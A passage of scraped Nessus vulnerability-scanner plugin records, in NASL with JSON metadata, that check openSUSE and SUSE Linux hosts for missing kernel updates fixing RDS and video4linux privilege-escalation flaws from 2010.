script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2010:0919-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of the openSUSE 11.2 Linux kernel fixes two critical\nsecurity issues and some bugs.\n\nFollowing security issues were fixed: CVE-2010-3904: A local privilege\nescalation in RDS sockets allowed local attackers to gain root\nprivileges.\n\nCVE-2010-2963: A problem in the compat ioctl handling in video4linux\nallowed local attackers with a video device plugged in to gain root\nprivileges on x86_64 systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=409504\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=441062\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=564324\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=646045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00044.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-debug-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-default-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-desktop-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-pae-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-source-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-source-vanilla-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-syms-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-trace-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-vanilla-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-base-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kernel-xen-devel-2.6.31.14-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-default-1.1_2.6.31.14_0.4-6.9.32\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"preload-kmp-desktop-1.1_2.6.31.14_0.4-6.9.32\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-debug / kernel-debug-base / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:26:13", "description": "This update of the openSUSE 11.3 Linux kernel fixes two critical security issues and some bugs.\n\nFollowing security issues were fixed: CVE-2010-3904: A local privilege escalation in RDS sockets allowed local attackers to gain privileges.\n\nCVE-2010-2963: A problem in the compat ioctl handling in video4linux allowed local attackers with a video device plugged in to gain privileges on x86_64 systems.", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kernel (openSUSE-SU-2010:0902-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-vmi", "p-cpe:/a:novell:opensuse:kernel-vmi-base", "p-cpe:/a:novell:opensuse:kernel-vmi-devel", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:preload-kmp-default", "p-cpe:/a:novell:opensuse:preload-kmp-desktop", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_KERNEL-101026.NASL", "href": "https://www.tenable.com/plugins/nessus/75552", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-3396.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75552);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3904\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2010:0902-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of the openSUSE 11.3 Linux kernel fixes two critical\nsecurity issues and some bugs.\n\nFollowing security issues were fixed: CVE-2010-3904: A local privilege\nescalation in RDS sockets allowed local attackers to gain privileges.\n\nCVE-2010-2963: A problem in the compat ioctl handling in video4linux\nallowed local attackers with a video device plugged in to gain\nprivileges on x86_64 systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=564324\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=573330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=643477\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=645066\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=646045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00033.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-desktop-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-ec2-extra-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-pae-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-source-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-source-vanilla-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-syms-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-trace-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vanilla-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-vmi-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-base-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-xen-devel-2.6.34.7-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"preload-kmp-default-1.1_k2.6.34.7_0.5-19.1.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"preload-kmp-desktop-1.1_k2.6.34.7_0.5-19.1.8\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:42", "description": "This update of the SUSE Linux Enterprise Server 11 SP1 kernel brings the kernel to 2.6.32.24 and fixes some critical security bugs and other non-security bugs.\n\nFollowing security bugs were fixed :\n\n - A iovec integer overflow in RDS sockets was fixed which could lead to local attackers gaining kernel privileges.\n (CVE-2010-3865)\n\n - A local privilege escalation in RDS sockets allowed local attackers to gain privileges. Please note that the net/rds socket protocol module only lives in the.\n (CVE-2010-3904)\n\n -extra kernel package, which is not installed by default on the SUSE Linux Enterprise Server 11.\n\n - A problem in the compat ioctl handling in video4linux allowed local attackers with a video device plugged in to gain privileges on x86_64 systems. (CVE-2010-2963)", "cvss3": {}, "published": "2011-01-21T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3433 / 3436 / 3445)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3865", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:btrfs-kmp-default", "p-cpe:/a:novell:suse_linux:11:btrfs-kmp-pae", "p-cpe:/a:novell:suse_linux:11:btrfs-kmp-xen", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-default", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-pae", "p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-xen", "p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-default", "p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-pae", "p-cpe:/a:novell:suse_linux:11:kernel-default", "p-cpe:/a:novell:suse_linux:11:kernel-default-base", "p-cpe:/a:novell:suse_linux:11:kernel-default-devel", "p-cpe:/a:novell:suse_linux:11:kernel-default-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default-man", "p-cpe:/a:novell:suse_linux:11:kernel-desktop-devel", "p-cpe:/a:novell:suse_linux:11:kernel-pae", "p-cpe:/a:novell:suse_linux:11:kernel-pae-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:11:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:11:kernel-source", "p-cpe:/a:novell:suse_linux:11:kernel-syms", "p-cpe:/a:novell:suse_linux:11:kernel-trace", "p-cpe:/a:novell:suse_linux:11:kernel-trace-base", "p-cpe:/a:novell:suse_linux:11:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:11:kernel-xen", "p-cpe:/a:novell:suse_linux:11:kernel-xen-base", "p-cpe:/a:novell:suse_linux:11:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:11:kernel-xen-extra", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_KERNEL-101102.NASL", "href": "https://www.tenable.com/plugins/nessus/51613", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51613);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3865\", \"CVE-2010-3904\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3433 / 3436 / 3445)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of the SUSE Linux Enterprise Server 11 SP1 kernel brings\nthe kernel to 2.6.32.24 and fixes some critical security bugs and\nother non-security bugs.\n\nFollowing security bugs were fixed :\n\n - A iovec integer overflow in RDS sockets was fixed which\n could lead to local attackers gaining kernel privileges.\n (CVE-2010-3865)\n\n - A local privilege escalation in RDS sockets allowed\n local attackers to gain privileges. Please note that the\n net/rds socket protocol module only lives in the.\n (CVE-2010-3904)\n\n -extra kernel package, which is not installed by default\n on the SUSE Linux Enterprise Server 11.\n\n - A problem in the compat ioctl handling in video4linux\n allowed local attackers with a video device plugged in\n to gain privileges on x86_64 systems. (CVE-2010-2963)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=564324\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=573330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=603738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=609196\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=612729\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=623307\");\n 